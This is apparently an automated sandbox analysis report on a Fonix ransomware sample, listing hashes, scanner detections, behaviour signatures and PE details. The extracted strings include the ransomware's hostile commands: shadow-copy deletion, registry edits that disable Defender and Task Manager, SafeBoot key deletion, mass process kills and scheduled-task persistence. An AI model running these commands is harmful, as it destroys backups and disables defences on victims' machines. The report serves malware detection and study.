Play interactive tour

Edit tour

Analysis Report fM498uO16Z

Overview

General Information

Sample Name:	fM498uO16Z (renamed file extension from none to exe)
Analysis ID:	338145
MD5:	e7f086119362368528a160be01f194ad
SHA1:	996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256:	e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d
Most interesting Screenshot:

Detection

Fonix

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Fonix ransomware

Yara detected Ransomware_Generic

Deletes shadow drive data (may be related to ransomware)

May drop file containing decryption instructions (likely related to ransomware)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

fM498uO16Z.exe (PID: 1068 cmdline: 'C:\Users\user\Desktop\fM498uO16Z.exe' MD5: E7F086119362368528A160BE01F194AD)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
fM498uO16Z.exe	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
fM498uO16Z.exe	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
Process Memory Space: fM498uO16Z.exe PID: 1068	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: fM498uO16Z.exe PID: 1068	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.fM498uO16Z.exe.1180000.0.unpack	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
0.2.fM498uO16Z.exe.1180000.0.unpack	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
0.0.fM498uO16Z.exe.1180000.0.unpack	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
0.0.fM498uO16Z.exe.1180000.0.unpack	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: fM498uO16Z.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: fM498uO16Z.exe	Virustotal: Detection: 56%	Perma Link
Source: fM498uO16Z.exe	Metadefender: Detection: 22%	Perma Link
Source: fM498uO16Z.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext,

Source: fM498uO16Z.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe

Source: fM498uO16Z.exe	String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: fM498uO16Z.exe	String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: fM498uO16Z.exe	String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Fonix ransomware

Show sources

Source: Yara match	File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match	File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE

Yara detected Ransomware_Generic

Show sources

Source: Yara match	File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match	File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp	Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: fM498uO16Z.exe	Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp	Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: fM498uO16Z.exe	Binary or memory string: How To Decrypt Files.hta\Help.txt

Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0122F14C
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011B31B0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0122F9E4
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_012289F8
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0121F880
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01229888
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0118E0E0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011B1B40
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0121F394
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0123A3FC
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0118CAD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01186D20
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01195D40
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011D9590
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011813F0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0122DD94
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011B4DD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01226400
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_012154A4
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01221CAC
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011884A0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01185CD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01190F80
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_01225784
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011B27D0
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_0121F618
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011B4650

Source: classification engine

Classification label: mal84.rans.evad.winEXE@1/0@0/0

Source: fM498uO16Z.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: fM498uO16Z.exe	Virustotal: Detection: 56%
Source: fM498uO16Z.exe	Metadefender: Detection: 22%
Source: fM498uO16Z.exe	ReversingLabs: Detection: 55%

Source: fM498uO16Z.exe

Static file information: File size 1266688 > 1048576

Source: fM498uO16Z.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe

Source: fM498uO16Z.exe

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\fM498uO16Z.exe

Code function: 0_2_01189877 push rbp; iretd

Source: C:\Users\user\Desktop\fM498uO16Z.exe

Code function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: fM498uO16Z.exe

Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: fM498uO16Z.exe

Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Source: C:\Users\user\Desktop\fM498uO16Z.exe

Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,

Source: C:\Users\user\Desktop\fM498uO16Z.exe

Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_012218C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: 0_2_011F2E0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: try_get_function,GetLocaleInfoW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\Users\user\Desktop\fM498uO16Z.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,

Source: C:\Users\user\Desktop\fM498uO16Z.exe

Code function: 0_2_011F32D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Application Shimming1	Obfuscated Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	File Deletion1	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fM498uO16Z.exe	56%	Virustotal		Browse
fM498uO16Z.exe	25%	Metadefender		Browse
fM498uO16Z.exe	55%	ReversingLabs	Win64.PUA.Wacapew
fM498uO16Z.exe	100%	Avira	HEUR/AGEN.1138883

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.fM498uO16Z.exe.1180000.0.unpack	100%	Avira	HEUR/AGEN.1138883		Download File
0.0.fM498uO16Z.exe.1180000.0.unpack	100%	Avira	HEUR/AGEN.1138883		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://uupload.ir/files/g510_windows_10.gif	fM498uO16Z.exe	false	high
https://www.who.int	fM498uO16Z.exe	false	high
https://code.jquery.com/jquery-latest.js	fM498uO16Z.exe	false	high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338145
Start date:	11.01.2021
Start time:	17:59:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 35s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	fM498uO16Z (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.rans.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.351821525994632
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	fM498uO16Z.exe
File size:	1266688
MD5:	e7f086119362368528a160be01f194ad
SHA1:	996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256:	e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d
SHA512:	4b2210e835856c7f3cdd9f0dcd79d0621d4316a945d37cfc083e41ff65acc249f3ec96fa7cb6c40742635038e084ef1a5992be3d40dcef3a8ddbb1fdd3a3031f
SSDEEP:	24576:t+ePQNk/3Ut+M2nQmlcuo63Zkuy7qrAOyM9ea:t+ePQ2U4MeQKcCWB7hONe
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........}P^...^...^.......J.......S............?.._.......O.......T...............Q...^...........r.......\......._......._...^..._..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x472a74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FF6EC6A [Thu Jan 7 11:11:38 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72154c931598a7b1abbe684878c6b103

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5608B11298h
dec eax
add esp, 28h
jmp 00007F5608B108B7h
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F5608B10A52h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F5608B10A55h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F5608B10A4Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F5608B100F2h
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F5608B109B1h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11f808	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x138000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x12d000	0x9dd4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xffdd0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xffca0	0x130	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
